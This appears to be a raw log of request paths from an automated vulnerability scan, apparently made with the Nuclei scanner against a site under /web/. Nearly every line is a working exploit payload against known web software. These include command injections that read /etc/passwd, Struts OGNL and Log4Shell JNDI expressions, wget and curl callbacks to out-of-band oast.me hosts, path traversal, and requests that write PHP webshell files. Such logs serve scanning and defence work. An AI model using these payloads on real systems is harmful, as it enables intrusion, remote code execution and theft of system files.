/web/ReportServer/Pages/ReportViewer.aspx
/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
/web/node/1?_format=hal_json
/web/run
/web/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/web/index.php?s=/home/page/uploadImg
/web/guest_auth/guestIsUp.php
/web/password_change.cgi
/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
/web/index.php?s=captcha
/web/dashboard/uploadID.php
/web/(download)/tmp/poc.txt
/web
/web/tests/support/stores/test_grid_filter.php?query=phpinfo();
/web/web.config.i18n.ashx?l=nuclei&v=nuclei
/web/servlet/UploadServlet
/web/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
/web/service/extdirect
/web/
/web/ucmdb-api/connect
/web/test.txt
/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
/web/solr/admin/cores?wt=json
/web/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png
/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D
/web/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg
/web/secure/ContactAdministrators!default.jspa
/web/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg
/web/objects/nuclei.txt
/web/login/
/web/run
/web/ReportServer/Pages/ReportViewer.aspx
/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
/web/node/1?_format=hal_json
/web/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/web/guest_auth/guestIsUp.php
/web/index.php?s=/home/page/uploadImg
/web/dashboard/uploadID.php
/web/index.php?s=captcha
/web/(download)/tmp/poc.txt
/web/service/extdirect
/web
/web/portal/info.jsp
/web/php/ping.php
/web/boardDataWW.php
/web/console/images/%252e%252e%252fconsole.portal
/web/wls-wsat/CoordinatorPortType
/web/web.config.i18n.ashx?l=nuclei&v=nuclei
/web/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
/web/ucmdb-api/connect
/web/solr/admin/cores?wt=json
/web/secure/ContactAdministrators!default.jspa
/web/login/
/web/actions/authenticate.php
/web/goform/setmac
/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnEkT2P49VWtBjX7t0PRxInp7.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B
/web/pages/systemcall.php?command=cat%20/etc/passwd
/web/_ignition/execute-solution
/web/website/blog/
/web/_search?pretty
/web/lib/crud/userprocess.php
/web/cgi-bin/slogin/login.py
/web/
/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
/web/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22
/web/nuclei.txt
/web
/web/
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/web/cobbler_api
/web/./RestAPI/LogonCustomization
/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/web/webtools/control/SOAPService
/web/rest/tinymce/1/macro/preview
/web/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
/web/guest_auth/poc.php?cmd=cat%20/etc/passwd
/web/_ignition/execute-solution
/web/.%0d./.%0d./.%0d./.%0d./bin/sh
/web/directdata/direct/router
/web/pages/createpage-entervariables.action?SpaceKey=x
/web/
/web/users/sign_in
/web/index.jsp
/web/checkValid
/web/?p=1
/web/index.php?plot=;wget%20http://c8ach799m8v918fkv9igcekcteyyyyyy1.oast.me
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/_ignition/execute-solution
/web/
/web/wls-wsat/CoordinatorPortType
/web/console/images/%252e%252e%252fconsole.portal
/web/pages/createpage-entervariables.action
/web/poc.txt
/web/
/web/api/experimental/test
/web/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
/web/hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20c8ach799m8v918fkv9igcekcteeyyyyya.oast.me%22%29%7D__::.x/
/web/
/web/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt
/web/actions/authenticate.php
/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnEkT2P49VWtBjX7t0PRxInp7.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B
/web/goform/setmac
/web/pages/systemcall.php?command=cat%20/etc/passwd
/web/website/blog/
/web/api/experimental/dags/example_trigger_target_dag/paused/false
/web/lib/crud/userprocess.php
/web/webadmin/out
/web/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
/web/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22
/web/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;
/web/ui/vropspluginui/rest/services/getstatus
/web/password.cgi
/web/25SnEkT2P49VWtBjX7t0PRxInp7.php
/web/struts2-rest-showcase/orders/3
/web/seeyon/thirdpartyController.do.css/..;/ajax.do
/web/_search
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/./RestAPI/LogonCustomization
/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/include/makecvs.php?Event=%60wget%20http%3A%2F%2Fc8ach799m8v918fkv9igcekcteeyyyyy6.oast.me%60
/web/v1/agent/service/register
/web/openam/oauth2/..;/ccversion/Version
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/index.jsp
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/qvisdvr/
/web/users/sign_in
/web/index.php?plot=;wget%20http://c8ach799m8v918fkv9igcekcteyyyyyy1.oast.me
/web/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fc8ach799m8v918fkv9igcekcteoyyyybn.oast.me%60
/web/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D
/web/./RestAPI/LogonCustomization
/web/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;
/web/search.php?searchtype=5
/web/checkValid
/web/orders/3
/web/index.php
/web/s=set&_method=__construct&method=*&filter[]=system
/web/_ignition/execute-solution
/web/meta
/web/pages/createpage-entervariables.action
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/web/invoker/JMXInvokerServlet/
/web/_ignition/execute-solution
/web/wsman
/web/clients/editclient.php?id=25SnEhNV0Evo0QU7TqpJMOkhDlo&action=update
/web/public/css/25SnEblNTyjWbu2Y5zCB5bmySnC.css
/web/poc.txt
/web/confluence/pages/createpage-entervariables.action?SpaceKey=x
/web/wls-wsat/CoordinatorPortType
/web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/_ignition/execute-solution
/web/wp-content/plugins/contact-form-7/readme.txt
/web/login.action
/web/sitecore/shell/ClientBin/Reporting/Report.ashx
/web/cgi-bin/mt/mt-xmlrpc.cgi
/web/invoker/EJBInvokerServlet/
/web/include/nuclei.txt
/web/wp-admin/admin-ajax.php?action=action_name
/web/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/webmail/basic/
/web/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/api/experimental/dags/example_trigger_target_dag/paused/false
/web/25SnEkT2P49VWtBjX7t0PRxInp7.php
/web/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/api/experimental/dags/example_trigger_target_dag/dag_runs
/web/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd
/web/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/admin/elfinder/elfinder-cke.html
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/_async/AsyncResponseService
/web/v1/agent/service/register
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybk.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybc.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/cgi-bin/file_transfer.cgi
/web/v2/query
/web/assets/backend/elfinder/elfinder-cke.html
/web/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;
/web/poc.jsp/
/web/index.php
/web/search.php?searchtype=5
/web/./RestAPI/LogonCustomization
/web/s=set&_method=__construct&method=*&filter[]=system
/web/lcms/index.php
/web/orders/3
/web/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test
/web/reports/rwservlet/showenv
/web/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";
/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
/web/./RestAPI/Connection
/web/lui/
/web/debug.php
/web/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
/web/meta
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web/mifs/j_spring_security_check
/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/web/wsman
/web/clients/editclient.php?id=25SnEhNV0Evo0QU7TqpJMOkhDlo&action=update
/web/
/web/logos_clients/1.php
/web/
/web/search/
/web/cgi-bin/status
/web/confluence/pages/createpage-entervariables.action?SpaceKey=x
/web/wp-content/plugins/contact-form-7/readme.txt
/web/lucee/admin/imgProcess.cfm?file=/whatever
/web/script/
/web?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/web/cgi-bin/login?LD_DEBUG=files
/web/_ignition/execute-solution
/web/cgi-bin/mt/mt-xmlrpc.cgi
/web/login.action
/web/_ignition/execute-solution
/web/invoker/EJBInvokerServlet/
/web/wp-admin/admin-ajax.php?action=action_name
/web/cf_scripts/scripts/ajax/package/cfajax.js
/web/webmail/basic/
/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27
/web/confluence/pages/createpage-entervariables.action
/web/SDK/webLanguage
/web/console/images/%252e%252e%252fconsole.portal
/web/owa/auth/x.js
/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/web/scripts/setup.php
/web/command.cgi?cat%20/etc/passwd
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybk.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybc.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekctjyyyyyb4.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekctjyyyyybh.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/assets/backend/elfinder/elfinder-cke.html
/web/poc.jsp/
/web/wls-wsat/RegistrationRequesterPortType
/web/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test
/web/assets/elFinder-2.1.9/elfinder.html
/web/lcms/index.php
/web/reports/rwservlet/showenv
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
/web/./RestAPI/Connection
/web/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///
/web/webtools/control/main
/web/lui/
/web/ajax/networking/get_netcfg.php?iface=;curl%20http://c8ach799m8v918fkv9igcekctjyyyyynn.oast.me/`whoami`;
/web/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";
/web/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web/assets/elFinder/elfinder.html
/web/help/admin-guide/test.jsp
/web/cgi-bin/status
/web/stat.jsp?cmd=chcp+437+%7c+dir
/web/?author=1
/web/hub/
/web/cgi?2
/web/upload
/web/backend/elfinder/elfinder-cke.html
/web/lucee/admin/imgProcess.cfm?file=/whatever
/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/web/script/
/web/boafrm/formSysCmd
/web/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
/web/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
/web/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27
/web/search.php?search=%22;wget+http%3A%2F%2Fc8ach799m8v918fkv9igcekctjyyyyynk.oast.me%27;%22
/web/SDK/webLanguage
/web/_ignition/execute-solution
/web/v1/backend1
/web/lucee/admin/imgProcess.cfm?file=/../../../context/25SnEo7EsotKg5Bp2pgjAYs9yNG.cfm
/web/console/images/%252e%252e%252fconsole.portal
/web/cf_scripts/scripts/ajax/package/cfajax.js
/web/cgi-bin/weblogin.cgi?username=admin';cat
/web/mgmt/shared/authn/login
/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/web/
/web/confluence/pages/createpage-entervariables.action
/web/owa/auth/x.js
/web/wiki/pages/createpage-entervariables.action?SpaceKey=x
/web/
/web/cf-scripts/scripts/ajax/package/cfajax.js
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/mgmt/tm/util/bash
/web/x
/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1
/web/lucee/25SnEo7EsotKg5Bp2pgjAYs9yNG.cfm
/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064
/web/system/sharedir.php
/web/cgi-bin/login.cgi
/web/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/web/poc.txt
/web/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml
/web/
/web/wiki/pages/createpage-entervariables.action
/web/
/web/webtools/control/main
/web/CFIDE/scripts/ajax/package/cfajax.js
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/page/exportImport/uploadOperation.jsp
/web/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.c8ach799m8v918fkv9igcekctjeyyyynw.oast.me/a%7D
/web/account
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/
/web/upload/UploadResourcePic.ashx?ResourceID=8382
/web//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c8ach799m8v918fkv9igcekctjeyyyyna.oast.me)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
/web/backend/elfinder/elfinder-cke.html
/web/cgi?2
/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/web/search.php?search=%22;wget+http%3A%2F%2Fc8ach799m8v918fkv9igcekctjyyyyynk.oast.me%27;%22
/web/upload
/web/v1/backend1
/web/cgi-bin/jarrewrite.sh
/web/
/web/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27
/web/boafrm/formSysCmd
/web/account
/web/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
/web/lucee/25SnEo7EsotKg5Bp2pgjAYs9yNG.cfm
/web/wiki/pages/createpage-entervariables.action
/web/system/sharedir.php
/web/nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml
/web/assets/php/upload.php
/web/elfinder/elfinder-cke.html
/web/jolokia/read/getDiagnosticOptions
/web/mgmt/tm/util/bash
/web/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/web/actuator/env
/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064
/web/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c8ach799m8v918fkv9igcekctjoyyyynh.oast.me%27);//
/web/pages/doenterpagevariables.action
/web/
/web/cgi?7
/web/CFIDE/scripts/ajax/package/cfajax.js
/web/en/php/usb_sync.php
/web/page/exportImport/fileTransfer/poc.jsp
/web/RPC2
/web/integration/saveGangster.action
/web/cfide/scripts/ajax/package/cfajax.js
/web/webadm/?q=moni_detail.do&action=gragh
/web/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=25SnEcrXAtgzl4ap2WMFzCZU5Nf.php&target=l1_Lw
/web//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c8ach799m8v918fkv9igcekctjeyyyyna.oast.me)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/web/graph_realtime.php?action=init
/web/
/web/api/timelion/run
/web/boaform/admin/formTracert
/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/web/api/user/reg
/web/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1
/web/?x=${jndi:ldap://127.0.0.1
/web/v1/25SnEheiBnTSLo3RyxVmlA2Sane.php
/web/login.htm
/web/cgi-bin/mainfunction.cgi
/web/?x=${jndi:ldap://${hostName}.c8ach799m8v918fkv9igcekctjayyyyr1.oast.me/a}
/web/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D
/web/infusions/downloads/downloads.php?cat_id=${system(ls)}
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/cgi/networkDiag.cgi
/web/solr/admin/cores?wt=json
/web/api/jsonws/invoke
/web/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
/web/context.json
/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D
/web/elfinder/elfinder-cke.html
/web/assets/php/upload.php
/web/assets/data/usrimg/25snegguasdxxncpzqo9ayydhc1.php
/web/uploads/assets/backend/elfinder/elfinder-cke.html
/web/__
/web/uploads/assets/backend/elfinder/elfinder.html
/web/ws_utc/resources/setting/options
/web/actuator/env
/web/uploads/elfinder/elfinder-cke.html
/web/
/web/pages/doenterpagevariables.action
/web/cgi?7
/web/
/web/RPC2
/web/pages/createpage.action?spaceKey=myproj
/web/cfide/scripts/ajax/package/cfajax.js
/web/?action=command&command=set_city_timezone&value=$(wget%20http://c8ach799m8v918fkv9igcekctkyyyyygn.oast.me))
/web/apply_sec.cgi
/web/user.action
/web/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/CF_SFSD/scripts/ajax/package/cfajax.js
/web/tools.cgi
/web/graph_realtime.php?action=init
/web/var
/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/web/api/timelion/run
